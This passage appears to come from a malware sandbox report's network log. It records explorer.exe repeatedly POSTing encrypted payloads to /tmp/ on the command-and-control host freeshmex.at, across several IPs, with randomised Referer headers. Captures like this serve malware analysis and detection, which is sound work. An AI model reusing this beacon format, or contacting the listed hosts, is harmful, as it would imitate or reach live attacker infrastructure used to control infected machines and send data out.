                                                        Nov 20, 2022 23:29:25.591377974 CET | 2012 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 3e 31 ad f5
                                                        Nov 20, 2022 23:29:26.479214907 CET | 2012 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:26 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        22 | 192.168.2.4 | 49720 | 41.41.255.235 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:26.584254980 CET | 2013 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://mwivfd.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 155
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:26.584254980 CET | 2013 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 30 2c d8 86
                                                        Nov 20, 2022 23:29:27.059041023 CET | 2014 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:26 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        23 | 192.168.2.4 | 49721 | 222.236.49.123 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:27.376996040 CET | 2015 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://iqeagnejjt.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 154
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:27.377290010 CET | 2015 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 32 32 c1 a2
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu22yDT`fc9pW+,hnML69h{+J
                                                        Nov 20, 2022 23:29:28.573755026 CET | 2016 | IN | HTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:27 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        24 | 192.168.2.4 | 49722 | 41.41.255.235 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:28.678064108 CET | 2017 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://epgfrxxkra.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 164
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:28.678082943 CET | 2017 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 66 51 f8 f2
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vufQqy~\;8y}Y&xK3Q!ZjE!>E
                                                        Nov 20, 2022 23:29:29.086935043 CET | 2018 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:28 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        25 | 192.168.2.4 | 49723 | 175.119.10.231 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:29.402513027 CET | 2019 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://jksmgkjj.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 199
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:29.402838945 CET | 2019 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 2f 3c eb 91
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu/<S[+w z1F}2d}B!(]*f bH"0_BA9RIjDU
                                                        Nov 20, 2022 23:29:30.610542059 CET | 2020 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:29 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        26 | 192.168.2.4 | 49724 | 210.182.29.70 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:31.517656088 CET | 2021 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://ctvfqb.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 261
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:31.517844915 CET | 2021 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 50 15 dd 92
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuP@Fe_"rMSgRl ArB2<|dBIg"r/2N<Z*P#)O0fzowONlxJ&H13
                                                        Nov 20, 2022 23:29:32.595757008 CET | 2021 | IN | HTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:32 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        27 | 192.168.2.4 | 49725 | 222.236.49.123 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:33.363390923 CET | 2022 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://sopric.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 141
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:33.363420010 CET | 2023 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 66 2a c2 93
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuf*]O[V(bx2Em)g*pOX&VWA
                                                        Nov 20, 2022 23:29:34.293982029 CET | 2023 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:33 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        28 | 192.168.2.4 | 49726 | 175.119.10.231 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:34.630713940 CET | 2024 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://nyiltqe.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 149
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:34.630990982 CET | 2024 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 3c 23 a8 f4
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu<#9GwLi`R3>pt>aIKEG#%S"L
                                                        Nov 20, 2022 23:29:35.824575901 CET | 2025 | IN | HTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:35 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        29 | 192.168.2.4 | 49727 | 210.182.29.70 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:36.126864910 CET | 2026 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://kqevfdrdxv.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 233
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:36.130844116 CET | 2026 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 74 24 a6 ab
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vut$VJmqX.K;ta)0+u*D7.IAHH+H)`^2][|StVAZwSxgD#}/
                                                        Nov 20, 2022 23:29:37.219599962 CET | 2027 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:36 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        3 | 192.168.2.4 | 49700 | 222.236.49.123 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:00.905910015 CET | 151 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://svuhccb.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 316
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:00.906945944 CET | 152 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5b 5f c4 8b
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu[_p yO];-,cd7Jopdwi!TuXV ~ie\>1#^8;OC}*n:JB;vYZ8kq6F(
                                                        Nov 20, 2022 23:29:02.113181114 CET | 152 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:01 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        30 | 192.168.2.4 | 49728 | 222.236.49.123 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:37.555684090 CET | 2028 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://hkqddhkgrs.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 360
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:37.555684090 CET | 2028 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 5f 4f a3 f7
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu_OE>NC(tx>B%+}yjeS<(4N3Ne6>2fJ=MK(aWP8YZ=i|xX^c r4h0.
                                                        Nov 20, 2022 23:29:38.738382101 CET | 2029 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:38 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        31 | 192.168.2.4 | 49729 | 190.147.188.50 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:38.939202070 CET | 2030 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://vppnf.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 163
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:38.939950943 CET | 2030 | OUT | Data Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 47 54 a5 b6
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuGTXHbLan*0~+.f[\@8JI?Va)5l
                                                        Nov 20, 2022 23:29:39.731589079 CET | 2031 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:39 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        32 | 192.168.2.4 | 49730 | 210.182.29.70 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:40.008032084 CET | 2032 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://jlawl.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 125
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:40.008094072 CET2032OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 41 5b a7 ae
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuA[TSBW<UPwe63
                                                        Nov 20, 2022 23:29:40.836579084 CET | 2033 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:40 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        33 | 192.168.2.4 | 49731 | 210.182.29.70 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:41.585199118 CET | 2034 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://lccctghley.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 230
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:41.585227013 CET2034OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 3b 4c dd 99
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu;LNVk\cK(B-X(f^9_hKG=PG)Iut_Ag)z5n:zM.~.*wx#l[
                                                        Nov 20, 2022 23:29:42.662532091 CET | 2035 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:42 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        34 | 192.168.2.4 | 49732 | 222.236.49.123 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:42.980601072 CET | 2036 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://gkaof.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 353
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:42.981434107 CET2036OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 2c 15 cd ae
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu,Z/Sg]q7n2En/ezSGOX?.}9KK:Yh@pkR.*L>HuFAv2ckyij"s)Zp(i
                                                        Nov 20, 2022 23:29:44.183577061 CET | 2037 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:43 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        35 | 192.168.2.4 | 49733 | 175.119.10.231 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:44.502536058 CET | 2038 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://wwdygs.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 177
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:44.502643108 CET2038OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 2d 47 ce f7
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu-Gm+f~Vl~z\k.2{#]?y_,^N}W*4an\/P*/
                                                        Nov 20, 2022 23:29:45.687060118 CET | 2039 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:45 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
